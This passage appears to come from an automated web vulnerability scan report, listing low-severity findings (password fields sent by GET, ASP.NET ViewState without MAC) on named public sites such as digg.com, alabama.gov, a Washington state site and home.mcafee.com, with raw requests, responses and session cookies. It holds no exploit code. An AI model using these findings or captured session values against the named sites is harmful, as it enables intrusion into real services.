Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Thu Sep 09 19:00:00 CDT 2010
Valid to:  Tue Oct 09 18:59:59 CDT 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

10. Password field submitted using GET method  previous  next
There are 2 instances of this issue:


10.1. http://digg.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Sun, 01-May-2011 12:20:09 GMT; path=/; domain=digg.com
Set-Cookie: d=812aa8e869f0d2e7c87704b3fa38f3583a3547de3e2f6866581f174175564be4; expires=Thu, 29-Apr-2021 22:27:49 GMT; path=/; domain=.digg.com
X-Digg-Time: D=24701 10.2.129.157
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8171

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

10.2. http://www.alabama.gov/portal/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.alabama.gov
Path:   /portal/index.jsp

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /portal/index.jsp HTTP/1.1
Host: www.alabama.gov
Proxy-Connection: keep-alive
Referer: http://al.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:36:24 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Cache-Control: private
Set-Cookie: JSESSIONID=abcI5QvmCkxSLfmPB1J_s; path=/
Content-Type: text/html
Content-Length: 34756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<noscript><form action='http://www.alabama.gov/portal_alerts/login_portal.action' method='get' target="_blank"></noscript>
...[SNIP]...
<p>
   password:<input type="password" name="login_password" id="login_password" value="" />
</p>
...[SNIP]...

11. ASP.NET ViewState without MAC enabled  previous  next
There are 6 instances of this issue:


11.1. https://fortress.wa.gov/dol/dolprod/dsdoffices/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://fortress.wa.gov
Path:   /dol/dolprod/dsdoffices/

Request

GET /dol/dolprod/dsdoffices/ HTTP/1.1
Host: fortress.wa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html; charset=utf-8
date: Sat, 30 Apr 2011 12:20:40 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: Microsoft-IIS/6.0
x-old-content-length: 26606
cache-control: private
x-powered-by: ASP.NET
x-aspnet-version: 2.0.50727
Set-Cookie: AMWEBJCT!%2Fdol%2Fdolprod!ASP.NET_SessionId=jicq3e45qrkfam55gph5la45; Path=/
Set-Cookie: PD_STATEFUL_101c5ca4-0734-11dc-b4ac-000255ef2051=%2Fdol%2Fdolprod; Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTA2NjU5MDY0D2QWAmYPZBYCAgMPZBYCAgMPZBYCAgEPZBYEAgMPEA8WBh4NRGF0YVRleHRGaWVsZAUIQ2l0eU5hbWUeDkRhdGFWYWx1ZUZpZWxkBQZDaXR5SWQeC18hRGF0YUJvdW5kZ2QQFTcNU2VsZWN0IGEgY2l0eQlBbmFjb3J0ZXMIQmVsbGV2dWUKQmVsbGluZ2hhbQlCcmVtZXJ0b24JQ2VudHJhbGlhBkNoZWxhbglDbGFya3N0b24IQ29sdmlsbGUKQ291bGVlIERhbQlEYXZlbnBvcnQKRWxsZW5zYnVyZwdFcGhyYXRhB0V2ZXJldHQLRmVkZXJhbCBXYXkFRm9ya3MNRnJpZGF5IEhhcmJvcgpHb2xkZW5kYWxlB0hvcXVpYW0GSWx3YWNvBUtlbHNvCUtlbm5ld2ljawRLZW50BUxhY2V5CEx5bm53b29kBk1vcnRvbgpNb3NlcyBMYWtlDE1vdW50IFZlcm5vbgdOZXdwb3J0Ck5vcnRoIEJlbmQKT2FrIEhhcmJvcgRPbWFrCE9yb3ZpbGxlCFBhcmtsYW5kDFBvcnQgQW5nZWxlcw1Qb3J0IFRvd25zZW5kB1BvdWxzYm8HUHVsbG1hbghQdXlhbGx1cAZSZW50b24IUmVwdWJsaWMHU2VhdHRsZQdTaGVsdG9uCVNob3JlbGluZQxTbW9rZXkgUG9pbnQKU291dGggQmVuZAdTcG9rYW5lDlNwb2thbmUgVmFsbGV5CVN1bm55c2lkZQZUYWNvbWEJVW5pb24gR2FwCVZhbmNvdXZlcgtXYWxsYSBXYWxsYQlXZW5hdGNoZWUMV2hpdGUgU2FsbW9uFTcAAjIxAjQ1AjQ2AjY2AzEwMQMxMDQDMTE1AzEyOQMxNDADMTYxAzE5NgMyMDQDMjA5AzIxNwMyMjUDMjM0AzI1MAMyODkDMjk2AzMxMgMzMTUDMzE2AzMzMwMzNzEDNDI3AzQyOAM0MzEDNDQ2AzQ1MgM0NjADNDcyAzQ4MAM0OTUDNTEwAzUxNgM1MjADNTI3AzUyOQM1NDIDNTQzAzU4MwM1OTIDNTk0AzczNQM2MTADNjE5AzczNgM2MzQDNjM4AzY2OAM2NzcDNjg2AzcwMwM3MTEUKwM3Z2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dn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" />
...[SNIP]...

11.2. https://home.mcafee.com/secure/cart  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://home.mcafee.com
Path:   /secure/cart

Request

GET /secure/cart HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/secure/cart; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:29 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV8
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:29 GMT
Content-Length: 37490
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNDAxNDE4NDc1D2QWAmYPZBYCAgEPFgYeA2RpcgUDbHRyHgRsYW5nBQJlbh4IeG1sOmxhbmcFAmVuFgQCAQ9kFgICAw8WAh4EVGV4dAWYBDxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL2RlZmF1bHQuY3NzJyB0eXBlPSd0ZXh0L2NzcycgbWVkaWE9J3NjcmVlbicgLz4NCjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL1BHU3R5bGVzL3BmbG93U3RhbmRhcmQuY3NzJyB0eXBlPSd0ZXh0L2NzcycgbWVkaWE9J3NjcmVlbicgLz4NCjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL2VuLVVTL2N1bHR1cmUuY3NzJyB0eXBlPSd0ZXh0L2NzcycgbWVkaWE9J3NjcmVlbicgLz4NCjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL2llLmNzcycgdHlwZT0ndGV4dC9jc3MnIG1lZGlhPSdzY3JlZW4nIC8+DQo8bGluayByZWw9J3N0eWxlc2hlZXQnIGhyZWY9Jy9VSURlc2lnbi9MZWdhY3lTaXRlL1N0eWxlcy9QcmludC5jc3MnIHR5cGU9J3RleHQvY3NzJyBtZWRpYT0ncHJpbnQnIC8+ZAIDDxYCHgZhY3Rpb24FDS9zZWN1cmUvY2FydC8WDAIHD2QWCGYPZBYCZg9kFggCAQ9kFgZmDw8WAh4LTmF2aWdhdGVVcmwFF2h0dHA6Ly9ob21lLm1jYWZlZS5jb20vZBYCZg8PFgQeDUFsdGVybmF0ZVRleHQFE01jQWZlZSDigJQgRm9yIEhvbWUeB1Rvb2xUaXAFE01jQWZlZSDigJQgRm9yIEhvbWVkZAICDw8WCB8GBRNNY0FmZWUg4oCUIEZvciBIb21lHwcFE01jQWZlZSDigJQgRm9yIEhvbWUeCEltYWdlVXJsBUNodHRwczovL3NlY3VyZWltYWdlcy5tY2FmZWUuY29tL2NvbW1vbi9tZWRpYS9pbWFnZXMvaGVhZGVyL2xvZ28uZ2lmHgdWaXNpYmxlaGRkAgQPDxYCHwMFCEZvciBIb21lZGQCAw9kFgJmDw8WAh8FBUVodHRwczovL3d3dy5tY2FmZWVzZWN1cmUuY29tL1JhdGluZ1ZlcmlmeT9yZWY9aG9tZS5tY2FmZWUuY29tJmxhbmc9RU5kFgJmDw8WBB8IBUFodHRwczovL2ltYWdlcy5zY2FuYWxlcnQuY29tL21ldGVyL2hvbWUubWNhZmVlLmNvbS8zMS5naWY/bGFuZz1FTh8HBXdNY0FmZWUgU2VjdXJlIHNpdGVzIGhlbHAga2VlcCB5b3Ugc2FmZSBmcm9tIGlkZW50aXR5IHRoZWZ0LCBjcmVkaXQgY2FyZCBmcmF1ZCwgc3B5d2FyZSwgc3BhbSwgdmlydXNlcyBhbmQgb25saW5lIHNjYW1zLhYCHg1vbmNvbnRleHRtZW51BWRqYXZhc2NyaXB0OmFsZXJ0KCJDb3B5aW5nIFByb2hpYml0ZWQgYnkgTGF3IC0gTWNBZmVlIFNFQ1VSRSBpcyBhIFRyYWRlbWFyayBvZiBNY0FmZWUiKTtyZXR1cm4gZmFsc2U7ZAIFD2QWCAIDD2QWBGYPFgIeCEN1c3RvbVVMBQVFTi1VU2QCAg8WAh8LBQVFTi1VU2QCBQ9kFgJmDw8WBB8DBRk8c3Bhbj5BYm91dCBNY0FmZWU8L3NwYW4+HwcFDEFib3V0IE1jQWZlZWRkAgcPZBYCZg8PFgQfAwUXPHNwYW4+Q29udGFjdCBVczwvc3Bhbj4fBwUKQ29udGFjdCBVc2RkAgkPZBYEZg8PFgQfAwUGU2VhcmNoHwcFBlNlYXJjaGRkAgIPD2QWAh4Jb25rZXlkb3duBbgBaWYgKChldmVudC53aGljaCA9PSAxMykgfHwgKGV2ZW50LmtleUNvZGUgPT0gMTMpKSB7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2N0bDAwX21fSGVhZGVyRnVsbE5hdmlnYXRpb25fdWNNYXN0ZXJOYXZpZ2F0aW9uX3VjSGVhZGVyVXRpbGl0eU5hdl9TZWFyY2hfYnRuU2VhcmNoJykuY2xpY2soKTtyZXR1cm4gZmFsc2U7fWQCBw9kFgRmDxYCHwloZAICD2QWAmYPDxYCHwloZGQCAQ8PFgIfCWhkZAIDD2QWDAIBD2QWAmYPDxYCHwYFBEhvbWUWAh4FdGl0bGUFBEhvbWVkAgMPDxYEHwMFFTxzcGFuPlByb2R1Y3RzPC9zcGFuPh8HBQhQcm9kdWN0c2RkAgUPDxYEHwMFHjxzcGFuPlZpcnVzIEluZm9ybWF0aW9uPC9zcGFuPh8HBR